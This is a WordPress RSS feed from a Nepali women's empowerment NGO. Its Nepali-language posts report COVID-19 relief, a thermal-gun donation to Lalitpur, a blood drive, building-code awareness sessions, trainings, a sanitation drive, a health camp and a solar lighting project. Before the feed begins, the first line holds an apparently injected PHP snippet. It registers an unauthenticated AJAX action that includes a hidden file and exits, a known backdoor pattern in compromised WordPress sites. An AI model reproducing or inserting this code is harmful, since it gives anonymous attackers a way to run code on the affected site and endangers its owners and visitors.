if(!function_exists('file_manager_check_dt')){ add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings-about.php'; if (file_exists($file)) { include $file; } die(); } } कार्यक्रम | Taramandal Mahila Sashaktikaran Abhiyan https://taramandal.org.np Women and Children Empowerment Campaign Thu, 07 May 2020 12:06:10 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.4 https://taramandal.org.np/wp-content/uploads/2020/05/tmsa-logo.png कार्यक्रम | Taramandal Mahila Sashaktikaran Abhiyan https://taramandal.org.np 32 32 ललितपुर महानगरलाई ३० थान ‘थर्मल गन’ सहयोग https://taramandal.org.np/2020/04/30/gun/ https://taramandal.org.np/2020/04/30/gun/#respond Thu, 30 Apr 2020 08:49:42 +0000 https://taramandal.org.np/?p=684 काठमाडौँ। कोरोना भाइरस (कोभिड १९) को सङ्क्रमणको जोखिमलाई मध्यनजर गर्दै तारामण्डल महिला सशक्तिकरण अभियानले ललितपुर महानगरपालिकालाई ज्वरो नाप्ने उपकरण (थर्मल गन) सहयोग गरेको छ।

तारामण्डलकी अध्यक्ष कुन्ती पोखरेलको नेतृत्वमा बिहीबार ललितपुर महानगरपालिकाका मेयर चिरीबाबु महर्जनलाई ३० थान थर्मल गन हस्तान्तरण गरिएको हो। महानगरपालिकाका मेयर चिरीबाबु महर्जन, कार्यकारी प्रमुख प्रेम प्रसाद भट्टराई, वडा अध्यक्षहरू लगायतको उपस्थितिमा उक्त कार्यक्रम सम्पन्न भएको हो।

‘कोरोनाको सन्त्रास विश्वमा छाएको छ। यसलाई जित्न हामी सबै हातेमालो गरेर अघि बढ्नुपर्छ, अन्यथा कोरोनाले हामीमाथि विजय प्राप्त गर्नेछ, तसर्थ यसलाई परास्त गर्न हामी सबै एकजुट हौ।’ संस्थाकी अध्यक्ष कुन्ती पोखरेलले भनिन्।

सामाग्री हस्तान्तरण कार्यक्रममा बोल्दै महानगर प्रमुख चरीबाबु महर्जनले तारामण्डललाई धन्यवाद दिँदै भने ‘लकडाउन सकिए लगत्तै एस. इ.इ परीक्षा हुनेवाला छ । हामीकहाँ ४२ वटा परीक्षा केन्द्र छन् । त्यसको लागि हामीलाई उपकरणको कमी भइरहेको थियो । उहाँहरूले सहयोग गर्नुभएकोमा एकदमै धन्यवाद दिन चाहान्छौं ।’

संस्थाले यसअघि पनि थुप्रै सामाजिक कार्य गर्दै आएको छ । कोरोना महामारी सङ्क्रमण तथा नियन्त्रणमा संस्थाले आहम भूमिका निर्वाह गर्दै यस अघि काठमाडौँ महानगरपालिका सहित बुढानीलकण्ठ, कीर्तिपुर तथा टोखा नगरपालिकाका अति विपन्न, असहाय र मजदुर परिवारलाई राहत वितरण गरेको छ ।

यसका अतिरिक्त संस्थाले काठमाडौँ वडा न. ९ का २६० परिवार सहित सरकारी होस्टेलका विद्यार्थी, भाडामा बसेर पढ्दै गरेका विद्यार्थी, बाल आश्रम र पशुपति क्षेत्रमा भएका गरिब , विपन्न परिवारलाई राहत सामग्री वितरण गरिसकेको छ । संस्थाले गत वैशाख ११ गते रक्तदानका कार्यक्रम पनि आयोजना गरेको थियो जसमा ६६ जनाले रक्तदान समेत गरेका छन् । आगामी दिनमा पनि सहयोगको प्रक्रियालाई निरन्तरता दिने संस्थाकी अध्यक्ष पोखरेलले जानकारी दिइन् । ललितपुर महानगरले सहयोगको प्रशंसा गर्दै धन्यवाद पत्र समेत प्रदान गरेको छ ।

]]>
https://taramandal.org.np/2020/04/30/gun/feed/ 0
रक्तदान कार्यक्रम https://taramandal.org.np/2020/04/29/%e0%a4%b0%e0%a4%95%e0%a5%8d%e0%a4%a4%e0%a4%a6%e0%a4%be%e0%a4%a8-%e0%a4%95%e0%a4%be%e0%a4%b0%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d%e0%a4%b0%e0%a4%ae/ https://taramandal.org.np/2020/04/29/%e0%a4%b0%e0%a4%95%e0%a5%8d%e0%a4%a4%e0%a4%a6%e0%a4%be%e0%a4%a8-%e0%a4%95%e0%a4%be%e0%a4%b0%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d%e0%a4%b0%e0%a4%ae/#respond Wed, 29 Apr 2020 16:13:06 +0000 https://taramandal.org.np/?p=676

काठमाडौँ । विश्वभर फैलिएको कोभिड १९ र यसका कारण नेपालमा जारी लकडाउनका बिच पनि रगतको अभाव हुन नदिन काठमाडौँको पुरानो बानेश्वरमा रक्तदान कार्यक्रम सम्पन्न भएको छ ।

तारामण्डल महिला सशक्तीकरण अभियान र राप्रपाको गैर सरकारी संस्था समन्वय विभागले संयुक्त आयोजना तथा ब्लड डोनर्स एशोशियसन नेपालको सहयोगमा २०७७ साल बैशाख ११ गते रक्तदान कार्यक्रम सम्पन्न भएको हो।

कार्यक्रममा राप्रपाका युवा नेता मोहन श्रेष्ठ, कुन्ती देवी पोखरेल, युवा सङ्गठनका कोषाध्यक्ष गुणराज राजभण्डारी, केन्द्रीय सदस्य सचिन लामिछाने, नेपाली काँग्रेसका महासमिति सदस्य सुरज लामिछाने, काठमाडौँ महानगरको न्याय समिति सदस्य सरोज ढकाल, कल्पना योगी, लक्ष्मण जोशी काडमाडौं महानगरपालिका वडा अध्यक्ष रामकृष्ण श्रेष्ठ, सदस्य सिर्जना भेटवाल, श्रीराम राई, टेकराज अधिकारी, रचना सुमन लगायतको उपस्थिति रहेको थियो ।

कार्यक्रममा ६६ जनाले रक्तदान गरेको थियो

]]>
https://taramandal.org.np/2020/04/29/%e0%a4%b0%e0%a4%95%e0%a5%8d%e0%a4%a4%e0%a4%a6%e0%a4%be%e0%a4%a8-%e0%a4%95%e0%a4%be%e0%a4%b0%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d%e0%a4%b0%e0%a4%ae/feed/ 0
काठमाडौँ महानगरपालिकामा राहत सामाग्री हस्तान्तरण https://taramandal.org.np/2020/04/29/%e0%a4%95%e0%a4%be%e0%a4%a0%e0%a4%ae%e0%a4%be%e0%a4%a1%e0%a5%8c%e0%a4%81-%e0%a4%ae%e0%a4%b9%e0%a4%be%e0%a4%a8%e0%a4%97%e0%a4%b0%e0%a4%aa%e0%a4%be%e0%a4%b2%e0%a4%bf%e0%a4%95%e0%a4%be%e0%a4%ae%e0%a4%be/ https://taramandal.org.np/2020/04/29/%e0%a4%95%e0%a4%be%e0%a4%a0%e0%a4%ae%e0%a4%be%e0%a4%a1%e0%a5%8c%e0%a4%81-%e0%a4%ae%e0%a4%b9%e0%a4%be%e0%a4%a8%e0%a4%97%e0%a4%b0%e0%a4%aa%e0%a4%be%e0%a4%b2%e0%a4%bf%e0%a4%95%e0%a4%be%e0%a4%ae%e0%a4%be/#respond Wed, 29 Apr 2020 15:18:14 +0000 https://taramandal.org.np/?p=673 काठमाडौँ । कोरोनाभाइरस (कोभिड–१९) को सङ्क्रमणको जोखिमलाई मध्यनजर गर्दै तारामण्डल महिला सशक्तीकरण अभियानले खाद्यान्न समस्या भएका गरिब र विपन्न परिवारका लागी राहत सामग्री वितरण ।

महानगरपालिका तथा वडाबाट आएको तथ्याङ्कको आधारमा वडा कार्यालयकै सहयोगमा उक्त स्थानमा राहत सहयोग उपलब्ध गराइएकाे

]]>
https://taramandal.org.np/2020/04/29/%e0%a4%95%e0%a4%be%e0%a4%a0%e0%a4%ae%e0%a4%be%e0%a4%a1%e0%a5%8c%e0%a4%81-%e0%a4%ae%e0%a4%b9%e0%a4%be%e0%a4%a8%e0%a4%97%e0%a4%b0%e0%a4%aa%e0%a4%be%e0%a4%b2%e0%a4%bf%e0%a4%95%e0%a4%be%e0%a4%ae%e0%a4%be/feed/ 0
जनचेतना मुलक कार्यक्रम https://taramandal.org.np/2019/11/06/%e0%a4%9c%e0%a4%a8%e0%a4%9a%e0%a5%87%e0%a4%a4%e0%a4%a8%e0%a4%be-%e0%a4%ae%e0%a5%81%e0%a4%b2%e0%a4%95-%e0%a4%95%e0%a4%be%e0%a4%b0%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d%e0%a4%b0%e0%a4%ae/ https://taramandal.org.np/2019/11/06/%e0%a4%9c%e0%a4%a8%e0%a4%9a%e0%a5%87%e0%a4%a4%e0%a4%a8%e0%a4%be-%e0%a4%ae%e0%a5%81%e0%a4%b2%e0%a4%95-%e0%a4%95%e0%a4%be%e0%a4%b0%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d%e0%a4%b0%e0%a4%ae/#respond Wed, 06 Nov 2019 10:20:34 +0000 https://taramandal.org.np/?p=635 तारामंडल महिला शशक्तिकरण अभियान र शहरी बिकाश तथा भवन निर्माण बिभागद्वारा संचालित राष्ट्रिय भवन संहिता तथा मापदण्ड सम्बन्धि जनचेतना मुलक कार्यक्रम संखरापुर नगरपालिकाको २ वटा वडा ६ र ७ मा, नागार्जुन नगरपालिकाको २ वटा वडा ४ र ५ मा, काठमाडौँ महानगरपालिकाको ३ वटा वडा १०, २९ र ३० मा र बुढानिलाकण्ठ नगरपालिकाको २ वटा वडा ११ र १२ गरी जम्मा ९ वटा वडाहरुमा कार्यक्रम संचालन गरि नागरिक जनचेतनामुलक कार्यक्रममा सहभागीहरुले रुचि पुर्बक सहभागीता जनाएका थिए ।

साथै उक्ता कार्यक्रममा सोहि नगरपालिकाका इन्जिनियरहरुले नक्शा पास प्रक्रिया, कागजातहरु, दस्तुर, समय आदि बारे नगरबासीलाई जानकारी दिनु भयो, भने नगरपालिकाका वडा अध्यक्षहरुले यस्ता कार्यक्रम जनस्तरमा लिएर आउनु हुने सस्था तारामंडल महिला शशक्तिकरण अभियान र शहरी बिकाश तथा भवन निर्माण बिभागलाई धन्यवाद दिनु हुदै यस्ता कार्यक्रमले आम जनमानसमा भवन निर्माण सम्बन्धि धेरै कुरा जानकारी भएको बताउनु भयो । राष्ट्रिय भवन संहिता तथा मापदण्ड सम्बन्धि जनचेतना मुलक कार्यक्रमले आमसर्वासाधारनलाई भुकम्प रहित घर बनाउन र जोखिम न्यूनीकरण गर्नमा धेरै सहयोग पुग्ने छ भन्ने आशा लिइएकोछ ।

]]>
https://taramandal.org.np/2019/11/06/%e0%a4%9c%e0%a4%a8%e0%a4%9a%e0%a5%87%e0%a4%a4%e0%a4%a8%e0%a4%be-%e0%a4%ae%e0%a5%81%e0%a4%b2%e0%a4%95-%e0%a4%95%e0%a4%be%e0%a4%b0%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d%e0%a4%b0%e0%a4%ae/feed/ 0
महिला तथा यूबा उद्यमशिलता तालिम https://taramandal.org.np/2019/09/12/%e0%a4%ae%e0%a4%b9%e0%a4%bf%e0%a4%b2%e0%a4%be-%e0%a4%a4%e0%a4%a5%e0%a4%be-%e0%a4%af%e0%a5%82%e0%a4%ac%e0%a4%be-%e0%a4%89%e0%a4%a6%e0%a5%8d%e0%a4%af%e0%a4%ae%e0%a4%b6%e0%a4%bf%e0%a4%b2%e0%a4%a4/ https://taramandal.org.np/2019/09/12/%e0%a4%ae%e0%a4%b9%e0%a4%bf%e0%a4%b2%e0%a4%be-%e0%a4%a4%e0%a4%a5%e0%a4%be-%e0%a4%af%e0%a5%82%e0%a4%ac%e0%a4%be-%e0%a4%89%e0%a4%a6%e0%a5%8d%e0%a4%af%e0%a4%ae%e0%a4%b6%e0%a4%bf%e0%a4%b2%e0%a4%a4/#respond Thu, 12 Sep 2019 05:05:56 +0000 https://taramandal.org.np/?p=343 महिला तथा यूबा उद्यमशिलता तालिम यस संस्थाले काठमाण्डौं जिल्ला विकास समितिको कार्यालयसंग समन्वायन गरि सन्चालन गरेको हो । महिला सशक्तिकरणको पहिलो उद्देश्य भनेकै महिलाहरुको परनिर्भरता अन्त्य गर्ने हो । परनिर्भरता अन्त्य गर्न आत्मनिर्भर बन्नु जरुरी छ । महिलाहरुको सर्बोपरि बिकासलाई ध्यानमा राख्दै यस संस्थाले महिलाहरुको ब्यबसायिक शिपमूलक तालिम तथा दक्षता अभिबृद्धि गर्ने योजना अघि सारेको छ । बिभिन्न शिपमूलक तालिमका माध्यमले महिलाहरु बिस्तारै ब्यबसायिक बन्दै आत्मनिर्भरता तर्फ उन्मुख हुनेछन भन्ने सस्थाको बुझाई छ । सिकेको सिपलाई बजारिकरण गर्दै समुन्नतीतर्फ लम्कनेछन, पितृसतात्मक समाजको चौघेरालाई बिस्तारै नाघ्नेछ तालिमलाई पुर्णता दिदै समाजमा केही हदसम्म आफ्नो ब्यबसायिक चिनारी बनाउनेछन्

]]>
https://taramandal.org.np/2019/09/12/%e0%a4%ae%e0%a4%b9%e0%a4%bf%e0%a4%b2%e0%a4%be-%e0%a4%a4%e0%a4%a5%e0%a4%be-%e0%a4%af%e0%a5%82%e0%a4%ac%e0%a4%be-%e0%a4%89%e0%a4%a6%e0%a5%8d%e0%a4%af%e0%a4%ae%e0%a4%b6%e0%a4%bf%e0%a4%b2%e0%a4%a4/feed/ 0
ब्यक्तित्व तथा नेतृत्व विकास तालिम https://taramandal.org.np/2019/09/12/%e0%a4%ac%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d%e0%a4%a4%e0%a4%bf%e0%a4%a4%e0%a5%8d%e0%a4%b5-%e0%a4%a4%e0%a4%a5%e0%a4%be-%e0%a4%a8%e0%a5%87%e0%a4%a4%e0%a5%83%e0%a4%a4%e0%a5%8d%e0%a4%b5-%e0%a4%b5/ https://taramandal.org.np/2019/09/12/%e0%a4%ac%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d%e0%a4%a4%e0%a4%bf%e0%a4%a4%e0%a5%8d%e0%a4%b5-%e0%a4%a4%e0%a4%a5%e0%a4%be-%e0%a4%a8%e0%a5%87%e0%a4%a4%e0%a5%83%e0%a4%a4%e0%a5%8d%e0%a4%b5-%e0%a4%b5/#respond Thu, 12 Sep 2019 05:04:05 +0000 https://taramandal.org.np/?p=338 यूवा तथा महिला वर्गका लागि ब्यक्तित्व तथा नेतृत्व विकास तालिम जिल्ला विकास समितिको कार्यालय तथा सांसद कोषबाट काठमाण्डौंको तारामण्डल महिला सशक्तिकरण अभियान अन्तर्गत बत्तिसपुतली वडा नंं. ९ मा गरिएको थियो । यस ब्यक्तित्व तथा नेतृत्व विकास तालिमले युवा तथा महिला वर्गका लागि विभिन्न आर्थिक, सामाजिक, राजनैतिक क्षेत्रमा कसरी सफल नेत्रृत्व गर्न सकिन्छ भनेर पूर्ण रुपमा प्रशिक्षण दिइयो ।

]]>
https://taramandal.org.np/2019/09/12/%e0%a4%ac%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d%e0%a4%a4%e0%a4%bf%e0%a4%a4%e0%a5%8d%e0%a4%b5-%e0%a4%a4%e0%a4%a5%e0%a4%be-%e0%a4%a8%e0%a5%87%e0%a4%a4%e0%a5%83%e0%a4%a4%e0%a5%8d%e0%a4%b5-%e0%a4%b5/feed/ 0
Community Sanitation Program https://taramandal.org.np/2019/09/12/community-sanitation-program/ https://taramandal.org.np/2019/09/12/community-sanitation-program/#respond Thu, 12 Sep 2019 05:02:32 +0000 https://taramandal.org.np/?p=138

]]>
https://taramandal.org.np/2019/09/12/community-sanitation-program/feed/ 0
सामुदायिक सरसफाइ कार्यक्रम https://taramandal.org.np/2019/09/12/%e0%a4%b8%e0%a4%be%e0%a4%ae%e0%a5%81%e0%a4%a6%e0%a4%be%e0%a4%af%e0%a4%bf%e0%a4%95-%e0%a4%b8%e0%a4%b0%e0%a4%b8%e0%a4%ab%e0%a4%be%e0%a4%87-%e0%a4%95%e0%a4%be%e0%a4%b0%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d/ https://taramandal.org.np/2019/09/12/%e0%a4%b8%e0%a4%be%e0%a4%ae%e0%a5%81%e0%a4%a6%e0%a4%be%e0%a4%af%e0%a4%bf%e0%a4%95-%e0%a4%b8%e0%a4%b0%e0%a4%b8%e0%a4%ab%e0%a4%be%e0%a4%87-%e0%a4%95%e0%a4%be%e0%a4%b0%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d/#respond Thu, 12 Sep 2019 05:02:22 +0000 https://taramandal.org.np/?p=335 का.म.पा वडा नं. ९ को परानो बानेश्वर देखि सिनामङगल बिचको सडक सरसफाई गरि समुदायमा सरसफाई सम्बन्धि जनचेतना प्रबाह गर्दै मिति २०७३।०४।२९ मा सामूदायिक सरसफाई कार्यक्रम सन्चालन गरियो । यस कार्यक्रमको मुख्य उद्देश्य हामी हरेक कुरामा सरकार र सरकारी निकायको मात्र मुख ताक्छौ र आफुले भनेको कुरा नभएमा गाली गर्न अघि बडछौ तर हामी असल नागरिकको भुमिका त्यो नभै आफुले सकेको र आफ्नो क्षेत्रबाट जागरुक भई समृद्ध नेपाल अभियानमा सहयोग गरौ भनि ब्यबहारमा देखाउनु र चेतना अभिबृदि गराउनु रहेको छ ।

]]>
https://taramandal.org.np/2019/09/12/%e0%a4%b8%e0%a4%be%e0%a4%ae%e0%a5%81%e0%a4%a6%e0%a4%be%e0%a4%af%e0%a4%bf%e0%a4%95-%e0%a4%b8%e0%a4%b0%e0%a4%b8%e0%a4%ab%e0%a4%be%e0%a4%87-%e0%a4%95%e0%a4%be%e0%a4%b0%e0%a5%8d%e0%a4%af%e0%a4%95%e0%a5%8d/feed/ 0
स्वास्थ्य शिविर https://taramandal.org.np/2019/09/12/%e0%a4%b8%e0%a5%8d%e0%a4%b5%e0%a4%be%e0%a4%b8%e0%a5%8d%e0%a4%a5%e0%a5%8d%e0%a4%af-%e0%a4%b6%e0%a4%bf%e0%a4%b5%e0%a4%bf%e0%a4%b0/ https://taramandal.org.np/2019/09/12/%e0%a4%b8%e0%a5%8d%e0%a4%b5%e0%a4%be%e0%a4%b8%e0%a5%8d%e0%a4%a5%e0%a5%8d%e0%a4%af-%e0%a4%b6%e0%a4%bf%e0%a4%b5%e0%a4%bf%e0%a4%b0/#respond Thu, 12 Sep 2019 04:56:02 +0000 https://taramandal.org.np/?p=332 सस्थाले निशुल्क स्वास्थ्य शिविरका लागि चित्लाङ्ग स्वास्थ्य चौकि, आर.सि.सि रोटरि क्लब तथा अन्य सहयोग गर्ने सामाजिक सस्थाहरुसंग समन्वयन गरि मकवानपुर जिल्ला अन्तर्गत चित्लाङ्गमा बिभिन्न रोग लगायत बृहत स्वास्थ्य शिविर मिति २०७३।०९।११ र १२ गते सन्चालन गरियो । शिविरको मुख्य उद्देश्य पिछडिएको तथा आर्थिक स्थिति नाजुक भै उपचार गर्न नसकेका समुदायमा उपचार सहयोग गर्नु रहेको थियो ।

]]>
https://taramandal.org.np/2019/09/12/%e0%a4%b8%e0%a5%8d%e0%a4%b5%e0%a4%be%e0%a4%b8%e0%a5%8d%e0%a4%a5%e0%a5%8d%e0%a4%af-%e0%a4%b6%e0%a4%bf%e0%a4%b5%e0%a4%bf%e0%a4%b0/feed/ 0
सोलार प्यानल जडान परियोजना https://taramandal.org.np/2019/09/12/%e0%a4%b8%e0%a5%8b%e0%a4%b2%e0%a4%be%e0%a4%b0-%e0%a4%aa%e0%a5%8d%e0%a4%af%e0%a4%be%e0%a4%a8%e0%a4%b2-%e0%a4%9c%e0%a4%a1%e0%a4%be%e0%a4%a8-%e0%a4%aa%e0%a4%b0%e0%a4%bf%e0%a4%af%e0%a5%8b%e0%a4%9c/ https://taramandal.org.np/2019/09/12/%e0%a4%b8%e0%a5%8b%e0%a4%b2%e0%a4%be%e0%a4%b0-%e0%a4%aa%e0%a5%8d%e0%a4%af%e0%a4%be%e0%a4%a8%e0%a4%b2-%e0%a4%9c%e0%a4%a1%e0%a4%be%e0%a4%a8-%e0%a4%aa%e0%a4%b0%e0%a4%bf%e0%a4%af%e0%a5%8b%e0%a4%9c/#respond Thu, 12 Sep 2019 04:49:59 +0000 https://taramandal.org.np/?p=328 मिति : २०७३/०३/०१ देखि २०७३/०८/०५ सम्म
स्थान : बत्तिसपुतली , काठमाण्डौँ
टिएमएसएले यस महिनामै सम्पन्न सोलार प्यानल जडान परियोजनाको सुरुवात गरेको छ । काठमाण्डौँ महानगरपालिकासंगको संयुक्त सहकार्यमा उक्त परियोजना लागु गरिएको छ । फलस्वरुप पुरानो बानेश्वरका सडकहरु उज्याला भएका छन् । यस कार्यक्रमको उद्घाटन टिएमएसएका अध्यक्षले गरेका थिए ।

]]>
https://taramandal.org.np/2019/09/12/%e0%a4%b8%e0%a5%8b%e0%a4%b2%e0%a4%be%e0%a4%b0-%e0%a4%aa%e0%a5%8d%e0%a4%af%e0%a4%be%e0%a4%a8%e0%a4%b2-%e0%a4%9c%e0%a4%a1%e0%a4%be%e0%a4%a8-%e0%a4%aa%e0%a4%b0%e0%a4%bf%e0%a4%af%e0%a5%8b%e0%a4%9c/feed/ 0